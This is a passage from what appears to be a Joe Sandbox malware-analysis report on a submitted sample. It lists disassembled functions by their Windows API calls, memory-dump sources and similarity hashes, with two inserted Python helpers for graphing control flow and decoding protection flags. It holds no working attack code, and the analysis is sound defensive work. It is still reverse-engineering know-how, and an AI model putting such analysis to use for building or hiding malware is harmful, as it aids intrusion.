                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$Enum
                                                                                                            • String ID:
                                                                                                            • API String ID: 464197530-0
                                                                                                            • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                            • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                            • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                            • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph (function at 0x40591f; basic block id: address range, API called)
                                                                                                            • 1076: 0x40591f-0x40596a  CreateDirectoryW
                                                                                                            • 1077: 0x405970-0x40597d  GetLastError
                                                                                                            • 1078: 0x40596c-0x40596e
                                                                                                            • 1079: 0x405997-0x405999
                                                                                                            • 1080: 0x40597f-0x405993  SetFileSecurityW
                                                                                                            • 1081: 0x405995           GetLastError
                                                                                                            • Edges: 1076->1077, 1076->1078, 1077->1079, 1077->1080, 1078->1079, 1080->1078, 1080->1081, 1081->1079
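The report renders the control-flow graph of the function at 0x40591f as one flattened run of block ids, address ranges, API names and `a->b` edges. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses that run back into basic blocks and edges, finds which API-calling blocks are reachable from the entry block, and emits Graphviz DOT so the graph can be redrawn offline. The sample line is copied from this page; the format rules (an integer followed by a hex range opens a block, a bare name is an API attached to the block opened last, `a->b` is an edge) are inferred from it, not taken from any Joe Sandbox documentation.

```python
"""Parse a Joe Sandbox control_flow_graph line into basic blocks and edges."""
import re
from collections import defaultdict

# Copied from this page: the flattened CFG of the function at 0x40591f.
CFG_LINE = (
    "control_flow_graph 1076 40591f-40596a CreateDirectoryW "
    "1077 405970-40597d GetLastError 1076->1077 1078 40596c-40596e 1076->1078 "
    "1079 405997-405999 1077->1079 1080 40597f-405993 SetFileSecurityW 1077->1080 "
    "1078->1079 1080->1078 1081 405995 GetLastError 1080->1081 1081->1079"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID_RE = re.compile(r"^\d+$")
RANGE_RE = re.compile(r"^([0-9a-fA-F]+)(?:-([0-9a-fA-F]+))?$")


def parse_cfg(line):
    """Return (blocks, edges). blocks maps id -> {"start", "end", "apis"};
    edges is a list of (src_id, dst_id). Format rules inferred from the page:
    '<id> <hex>[-<hex>]' opens a block, a bare name is an API called in the
    block opened last, and '<id>-><id>' is a control-flow edge."""
    tokens = line.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            i += 1
            continue
        nxt = RANGE_RE.match(tokens[i + 1]) if i + 1 < len(tokens) else None
        if NODE_ID_RE.match(tok) and nxt:
            current = int(tok)
            start = int(nxt.group(1), 16)
            end = int(nxt.group(2), 16) if nxt.group(2) else start
            blocks[current] = {"start": start, "end": end, "apis": []}
            i += 2
            continue
        if current is None:
            raise ValueError(f"API name {tok!r} before any block")
        blocks[current]["apis"].append(tok)
        i += 1
    for src, dst in edges:
        if src not in blocks or dst not in blocks:
            raise ValueError(f"edge {src}->{dst} references an unknown block")
    return blocks, edges


def successors(edges):
    succ = defaultdict(list)
    for src, dst in edges:
        succ[src].append(dst)
    return succ


def entry_block(blocks):
    """Lowest-addressed block; the function's first instruction lives there."""
    return min(blocks, key=lambda b: blocks[b]["start"])


def exit_blocks(blocks, edges):
    """Blocks with no successor (the function's return paths)."""
    succ = successors(edges)
    return sorted(b for b in blocks if not succ.get(b))


def reachable_api_blocks(blocks, edges, api, entry=None):
    """Ids of blocks calling `api` reachable from `entry` (default: entry block)."""
    succ = successors(edges)
    start = entry_block(blocks) if entry is None else entry
    seen, stack, hits = set(), [start], []
    while stack:
        b = stack.pop()
        if b in seen:
            continue
        seen.add(b)
        if api in blocks[b]["apis"]:
            hits.append(b)
        stack.extend(succ.get(b, []))
    return sorted(hits)


def to_dot(blocks, edges, name="cfg"):
    """Graphviz DOT text; render with `dot -Tsvg`."""
    out = [f"digraph {name} {{", "  node [shape=box fontname=monospace];"]
    for bid in sorted(blocks):
        blk = blocks[bid]
        label = f"{blk['start']:x}-{blk['end']:x}"
        for api in blk["apis"]:
            label += "\\n" + api
        out.append(f'  n{bid} [label="{label}"];')
    out.extend(f"  n{src} -> n{dst};" for src, dst in edges)
    out.append("}")
    return "\n".join(out)


if __name__ == "__main__":
    blocks, edges = parse_cfg(CFG_LINE)
    print(to_dot(blocks, edges))
```

On this function the parser yields six blocks and eight edges; both GetLastError blocks (1077 and 1081) are reachable from the entry block 1076, and 1079 is the single exit.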
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                            • GetLastError.KERNEL32 ref: 00405976
                                                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                            • GetLastError.KERNEL32 ref: 00405995
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
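Two kinds of Windows flag constants appear in this function entry: the page-protection and region-type fields embedded in the .sdmp names of the Memory Dump Source list, and the 80000007 SECURITY_INFORMATION mask passed to SetFileSecurityW. The Python below is an added example, not part of the Joe Sandbox report or of the sample. It decodes both and flags any dumped region that is writable and executable at the same time, which is the check an analyst wants when deciding whether a dump holds unpacked or injected code rather than a normally mapped image. The constant values are the winnt.h definitions. The assignment of the dot-separated name fields (field 3 = base address, field 4 = protection, field 6 = region type) is an assumption inferred from the values on this page, which read consistently as a normally mapped PE image (read-only header at 0x400000, execute-read .text at 0x401000, read-write data at 0x40A000, all MEM_IMAGE); the remaining fields are returned raw and not interpreted.

```python
"""Decode the Windows flag constants found in a Joe Sandbox function listing:
page protection / region type in .sdmp dump names and the SECURITY_INFORMATION
mask passed to SetFileSecurityW."""

# Constants from winnt.h (exact values).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
SECURITY_INFORMATION = {
    0x00000001: "OWNER_SECURITY_INFORMATION",
    0x00000002: "GROUP_SECURITY_INFORMATION",
    0x00000004: "DACL_SECURITY_INFORMATION",
    0x00000008: "SACL_SECURITY_INFORMATION",
    0x00000010: "LABEL_SECURITY_INFORMATION",
    0x10000000: "UNPROTECTED_SACL_SECURITY_INFORMATION",
    0x20000000: "UNPROTECTED_DACL_SECURITY_INFORMATION",
    0x40000000: "PROTECTED_SACL_SECURITY_INFORMATION",
    0x80000000: "PROTECTED_DACL_SECURITY_INFORMATION",
}

# Dump names copied from the Memory Dump Source list on this page.
DUMPS = [
    "00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp",
]


def decode_flags(mask, table):
    """Names of the bits set in `mask`, lowest bit first; unknown bits kept as hex."""
    names, rest = [], mask
    for bit in sorted(table):
        if mask & bit:
            names.append(table[bit])
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:x}")
    return names


def decode_protect(value):
    """PAGE_* name for a protection DWORD, with modifier bits appended."""
    base = PAGE_PROTECT.get(value & 0xFF, f"0x{value & 0xFF:x}")
    mods = [name for bit, name in sorted(PAGE_MODIFIERS.items()) if value & bit]
    return "|".join([base] + mods)


def parse_dump_name(name):
    """Split an .sdmp name into its fields. ASSUMPTION (inferred from this page,
    not documented here): field 3 = base address, field 4 = page protection,
    field 6 = region type. Fields 0-2, 5 and 7 are returned raw, undecoded."""
    stem = name[: -len(".sdmp")] if name.endswith(".sdmp") else name
    fields = stem.split(".")
    if len(fields) != 8:
        raise ValueError(f"expected 8 dot-separated fields, got {len(fields)}")
    protect = int(fields[4], 16)
    region_type = int(fields[6], 16)
    return {
        "raw": fields,
        "base": int(fields[3], 16),
        "protect_value": protect,
        "protect": decode_protect(protect),
        "type": MEM_TYPE.get(region_type, f"0x{region_type:x}"),
    }


def writable_and_executable(info):
    """True for PAGE_EXECUTE_READWRITE / PAGE_EXECUTE_WRITECOPY regions: the
    protections expected on self-decrypted or injected code, not on a normally
    mapped image section."""
    return bool(info["protect_value"] & (0x40 | 0x80))


def triage(names):
    """(base, protection, type, suspicious) per dump, sorted by base address."""
    rows = [parse_dump_name(n) for n in names]
    return [(r["base"], r["protect"], r["type"], writable_and_executable(r))
            for r in sorted(rows, key=lambda r: r["base"])]


if __name__ == "__main__":
    for base, protect, region_type, suspicious in triage(DUMPS):
        print(f"{base:#010x} {protect:<24} {region_type:<12} {'RWX!' if suspicious else ''}")
    print(decode_flags(0x80000007, SECURITY_INFORMATION))
```

Run against the eight names above, no region is flagged, which matches an unmodified image mapping; the 80000007 mask decodes to owner, group and DACL with PROTECTED_DACL set, i.e. the freshly created directory is given an explicit DACL that does not inherit from its parent.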
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                            • String ID:
                                                                                                            • API String ID: 3449924974-0
                                                                                                            • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                            • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                            • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                            • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                              • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                            • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                            • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                            • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                            • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                            APIs
                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,0040652A,80000002), ref: 004062FC
                                                                                                            • RegCloseKey.ADVAPI32(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 00406307
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseQueryValue
                                                                                                            • String ID: Call
                                                                                                            • API String ID: 3356406503-1824292864
                                                                                                            • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                            • Instruction ID: efe3e51cb47fe95fa6bbb83f3cb46ebf457b8c4b35673ac5825ceff03b23bf8b
                                                                                                            • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                            • Instruction Fuzzy Hash: B301717250020AEBDF218F55CD09EDB3FA9EF55354F114039FD15A2150E778D964CBA4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                            • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                            • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                            • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                            • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                            • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                            • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                            • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                            • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                            • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                            • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                            • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                            • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                            • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                            • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                            • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
Memory Dump Source
• Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
• Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
• Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
• Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
Memory Dump Source
• Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
• Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
• Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
• Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
APIs
• GetTickCount.KERNEL32 ref: 004032F2
  • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
• SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
• SetFilePointer.KERNELBASE(001710A7,00000000,00000000,00414ED0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420
Memory Dump Source
• Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID: FilePointer$CountTick
• String ID:
• API String ID: 1092082344-0
• Opcode ID: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
• Instruction ID: a2c2ae871b20a7f651e14226ae934804f023725c52e887911cb1b1382089a511
• Opcode Fuzzy Hash: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
• Instruction Fuzzy Hash: 54313872610215DBD721DF29EEC496A3BA9F74039A754433FE900F62E0CBB99D018B9D
APIs
• GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 0040205D
  • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
  • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
  • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
  • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
